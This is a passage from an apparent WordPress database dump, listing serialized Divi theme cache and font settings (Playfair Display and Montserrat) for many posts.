{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34231,1427,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34224,1101,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34225,1025,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34226,1025,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34227,1025,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34220,1172,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34221,1101,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34222,1101,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34223,1101,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34216,1206,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34217,1172,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34218,1172,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34219,1172,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34213,1206,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34214,1206,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34215,1206,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34209,968,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34210,968,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34211,968,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34212,968,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34205,1281,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34206,1281,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34207,1281,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34208,1281,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34201,1383,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34202,1383,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34203,1383,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34204,1383,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34197,1385,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34198,1385,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34199,1385,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34200,1385,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34193,1233,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34194,1233,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34195,1233,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34196,1233,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34189,1442,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34190,1442,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34191,1442,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34192,1442,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34183,1533,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34184,1533,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34185,1464,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34186,1464,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34187,1464,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34188,1464,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34179,1597,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(34180,1597,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(34181,1533,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34182,1533,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(34177,1597,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(34178,1597,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0